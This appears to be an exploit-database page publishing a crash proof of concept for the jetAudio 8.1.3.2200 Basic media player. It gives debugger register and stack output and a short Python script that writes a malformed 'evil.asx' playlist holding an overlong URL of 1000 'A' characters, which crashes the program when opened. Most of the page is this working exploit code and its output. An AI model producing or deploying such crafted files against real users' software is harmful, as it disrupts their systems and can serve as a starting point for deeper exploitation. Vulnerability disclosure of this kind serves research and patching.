facebook facebook twitter rss

jetAudio 8.1.3.2200 Basic (asx) Crash POC

Author: Hadji Samir , Published: 02-01-2015
# Exploit Title         : jetAudio 8.1.3.2200 Basic (asx) Crash POC
# Product : jetAudio Basic
# Date : 27.12.2014
# Exploit Author : Hadji Samir s-dz@hotmail.fr
# Software Link : http://www.jetaudio.com/download/
# Vulnerable version : 8.1.3.2200 Basic
# Vendor Homepage : http://www.jetaudio.com/
# Tested on : Windows 7 x86 fr
#============================================================================================
# Open created POC file (evil.asx) with jetAudio
# Details
# eax=000000c0 ebx=00000000 ecx=01e5f21c edx=76ed64f4 esi=0000028c edi=01e5f264
# eip=76ed64f4 esp=01e5f21c ebp=01e5f288 iopl=0 nv up ei ng nz ac pe cy
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000297
# ntdll!KiFastSystemCallRet:
# 76ed64f4 c3 ret
# 0:007> kb
# ChildEBP RetAddr Args to Child
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 01e5f288 7665f003 0000028c 00000032 00000000 ntdll!KiFastSystemCallRet
# 01e5f2a0 7665efb2 0000028c 00000032 00000000 kernel32!WaitForSingleObjectEx+0x43

#============================================================================================
#!/usr/bin/python

from struct import pack
asx = ("http://%s")
buf = "\x41" * 1000
asx %= buf
fd = open("evil.asx", "w")
fd.write(asx)
fd.close()

Like us on Facebook :